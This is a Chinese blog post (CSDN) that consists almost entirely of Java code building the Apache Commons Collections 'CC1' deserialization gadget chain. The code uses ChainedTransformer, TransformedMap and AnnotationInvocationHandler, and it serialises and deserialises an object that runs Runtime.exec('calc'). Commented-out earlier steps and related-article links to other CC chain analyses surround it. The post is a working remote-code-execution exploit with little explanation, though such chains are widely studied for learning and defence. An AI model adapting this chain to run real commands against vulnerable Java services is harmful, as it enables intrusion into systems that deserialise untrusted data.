java反序列化CC1

已于 2023-09-17 21:04:41 修改
阅读量88 收藏
点赞数
分类专栏: 编程语言相关 文章标签: java c语言 android
于 2023-09-17 21:04:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/132953627
版权 
package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class Main {
    public static void main(String[] args) throws Exception{


//        Runtime r = Runtime.getRuntime();//单例模式,通过对应方法创建对象//问题一:r不能序列化,没有继承序列化接口
//        Class c = Runtime.class;
//        Method execMethod = c.getMethod("exec",String.class);
//        execMethod.invoke(r,"calc");


//        Class c = Runtime.class;
//        Method getRuntimeMethod = c.getMethod("getRuntime",null);
//        Runtime r = (Runtime) getRuntimeMethod.invoke(null,null);
//        Method execMethod = c.getMethod("exec", String.class);
//        execMethod.invoke(r,"calc");
//


//        Method getRuntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);
//        Runtime r = (Runtime) new InvokerTransformer("invoke",new Class[]{Object.class,Object.class},new Object[]{}).transform(getRuntimeMethod);
//        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});

        Transformer[] Transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(Transformers);


//        chainedTransformer.transform(Runtime.class);

//        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value","aaa");
        Map<Object,Object> transformedmap = TransformedMap.decorate(map,null,chainedTransformer);




        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
        annotationInvocationhdlConstructor.setAccessible(true);
        Object o = annotationInvocationhdlConstructor.newInstance(Target.class,transformedmap);


        serialize(o);
        unserialize("ser.bin");
    }


    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }


    public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

}
dumplings。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JAVA反序列化CC1分析
Re_ly0n的博客
03-26 5529
反序列化的原理 首先是要继承Serialize类只有继承了这个类菜能够进行序列化,如果某一个类没有继承serialize类并在一条利用链中所需要的地方,我们就可以通过反射来进行处理。例如在java中Runtime.getRuntime()是没有继承seralize类的 但是Runtime.class是继承了的 这样以来就可以通过反射来进行序列化和反序列化,反射核心代码如下 上面的代码都是可以成功弹出计算器的。利用链的构造尝试使用同名不同类的方法来进行调用。在这里就是复习...
RMIDeserialize:RMI 反序列化环境 一步步
04-22
RMI反序列化学习环境,细节请参考博客、 java -cp RMIDeserialize.jar com.lala.ServerAndRegister :起一个包含CC链可以被攻击的RMI服务 java -jar RMI-Bypass290.jar <攻击目标IP> <攻击目标端口> <本地...
java反序列化 cc链1 分析
m0_64815693的博客
04-17 1285
java反序列化 cc链1 分析
Java反序列化CC1链 详解
Jay17的博客
10-06 958
Java反序列化CC1链 详解
Java反序列化CC1链分析
热门推荐
混子
12-17 1万+
可能之前看Java CC1链的文章留下了有阴影把,有TransformedMap玩法,还有Lazymap玩法,最终还得借助AnnotationInvocationHandler或这动态代理,看着就头大,所以拖了一段时间,没办法,最终还是来了,洞一直在更新,我不加快节奏干洞,洞要给我说再见,这就很难受,不闹了,这篇文章主要是CC1链和那两种玩法
Java安全 反序列化(3) CC1链-TransformedMap版
qq_39947980的博客
03-21 1381
本文尝试从CC1的挖掘思路出发,理解CC1的实现原理
7-java安全——java反序列化CC1链分析
网络安全
07-04 3678
apache commons-collections组件反序列化漏洞的反射链也称为CC链,自从apache commons-collections组件爆出java第一个反序列化漏洞后,就像打开了新世界大门一样,之后很多java中间件也相继爆出反序列化漏洞。例如比较常用的反序列化漏洞利用工具ysoserial就使用了LazyMap类的利用链,本文将继续学习LazyMap类的利用链。 ...
java反序列化CC1 Transformmap攻击链--2022最新
weixin_49248030的博客
10-28 1036
java反序列化CC1 Transformmap攻击链逆向反推,Java反序列化CC1链分析
java反序列化 cc链6 分析
m0_64815693的博客
04-22 1038
java反序列化 cc链6 分析
12-java安全——java反序列化CC7链分析
网络安全
08-23 2581
在分析CC7链之前,需要对Hashtable集合的源码有一定的了解。 从思路上来说,我觉得CC7利用链更像是从CC6利用链改造而来,只不过是CC7链没有使用HashSet,而是使用了Hashtable来构造新的利用链。 经过测试,CC7利用链在jdk8u071和jdk7u81都可以利用成功,payload代码如下: package com.cc; import org.apache.commons.collections.Transformer; import org.apache.commo
如何利用Jackson序列化忽略指定类型的属性详解
08-26
Jackson 序列化是 Java 世界中最流行的序列化框架之一,对于 Apache Avro 对象的序列化提供了详细的解决方案。在本文中,我们将介绍如何利用 Jackson 序列化忽略指定类型的属性,以避免序列化时的 exception。 首先...
内存高效序列化库谷歌/ FlatBuffers
01-27
FlatBuffersFlatBuffers is a cross platform serialization library architected formaximum memory efficiency. It allows you to directly access serialized data without parsing/unpacking it first, while ...
GsonQuick:Gson的辅助工具类, 方便Gson的序列化
07-08
GsonQuickGson的辅助工具类, 方便Gson的序列化使用可以看Test里面的代码.示例Json如下: { "data": [{ "d": 771133, "a": 856813, "bigHash": "392b979d9568b2c9cc693ce577d7fadf" },{ "d": 123, "a": 43234, ...
schoolManager:使用面向对象概念并使用序列化来构建学校管理系统的学术工作
07-04
学校经理 Github: : 计算 II (2014-1) - CC / UFRRJ 团队成员: 保罗·泽维尔。 加布里埃尔·塞戈比亚 教师:Felipe Duarte
Geoserver源码解读三 GeoServerBasePage
最新发布
Yuanben_wuxin的博客
06-19 638
GeoServerBasePage 登录
Javascript)AI数字人mp4转canvas播放并去除背景绿幕
lx_nhs的博客
06-12 555
去除前:去除后: 3、可能会出现的报错 (1)视频路径跨域问题:解决:vue开启代理
【仿真建模-anylogic】FlowchartPort原理解析
zhaoyaxuan001的博客
06-14 384
FlowchartPort是流图组件端口的基类,一般不会直接使用;如果需要自行封装组件库时会用到;FlowchartPort继承Port类,并定义了一系列抽象函数;用于输入端口判定此刻是否不能接收Agent。用于输出端口判定是否有Agent准备离开。判定端口是否发生错误。
盲盒App开发时有哪些技术框架可以借鉴
bytekj的博客
06-14 652
在开发盲盒App时,可以根据项目需求和团队技术栈选择合适的技术框架。前端可以选择微信小程序框架、React Native或Vue.js等;后端可以选择Node.js或Spring Boot等;数据库可以选择MySQL或MongoDB等。同时,还需要考虑缓存、消息队列、支付和物流接口等其他技术来完善应用的功能和性能。
protobuf序列化
05-09
protobuf序列化具有以下优点:1)高效:protobuf序列化后的字节数组较小,序列化和反序列化效率高,占用的内存较少,可减少网络传输和存储开销;2)扩展性强:protobuf支持版本控制和兼容性,修改数据结构时不需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值